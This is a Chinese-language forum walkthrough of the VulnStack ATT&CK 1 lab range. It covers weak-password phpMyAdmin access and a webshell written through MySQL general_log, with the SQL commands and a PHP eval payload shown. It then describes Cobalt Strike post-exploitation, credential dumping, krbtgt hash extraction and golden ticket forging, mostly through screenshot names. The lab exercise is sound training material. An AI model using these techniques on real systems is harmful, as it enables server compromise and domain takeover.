標題:VulnStack ATT\u0026CK 1 靶場

taibeihacker

Moderator

VulnStack ATTCK 1 靶场​

环境​

20200416115230.png-water_print

信息收集​

端口探测​

20200416115357.png-water_print

只開放了80、3306

目录扫描​

訪問80 端口,發現首頁為PHP 探針:
20200416115600.png-water_print

目錄掃描:
20200416115450.png-water_print

發現phpmyadmin。

漏洞挖掘​

phpmyadmin 嘗試若口令登錄:
root:root 登錄成功。
20200416115724.png-water_print

phpmyadmin 後台的getshell 方法有很多種
先看下常規的select into outfile:
20200416115754.png-water_print

這裡secure_file_priv 為null,不允許寫入寫出。
放棄此方法,嘗試MySQL 通用查詢日誌general_log 寫出webshell。
先看下全局變量的配置show global variables like '%general%' :
20200416115844.png-water_print

這裡並沒有開啟通用日誌,那我就自己打開,並自定義保存文件:
1
2
SET GLOBAL general_log='ON'
SET GLOBAL general_log_file='C:/phpStudy/WWW/shell.php'
20200416120022.png-water_print

這裡的絕對路徑是通過前面的探針獲取到的。
然後寫webshell select '?php @eval($_POST['bbll]);':
20200416120045.png-water_print

蟻劍連接:
20200416120108.png-water_print

内网渗透​

首先查看系統位數:
1
wmic cpu get addresswidth
20200416120239.png-water_print

用cs 生成木馬,上傳:
20200416120319.png-water_print

執行:
20200416120340.png-water_print

上線,直接是管理員權限:
20200416120400.png-water_print

查看用戶權限:
20200416120421.png-water_print

查看當前登錄域:
20200416120653.png-water_print

查看域內用戶:
20200416120848.png-water_print

查看域內主機:
20200416120908.png-water_print

查看域管:
20200416120941.png-water_print

dump 密碼:
20200416121030.png-water_print

横向移动​

20200416121203.png-water_print

DC 上線後,使用hashdump dump krbtgt NTLM Hash:
20200416121319.png-water_print

製作黃金票據:
20200416121339.png-water_print
 
返回
上方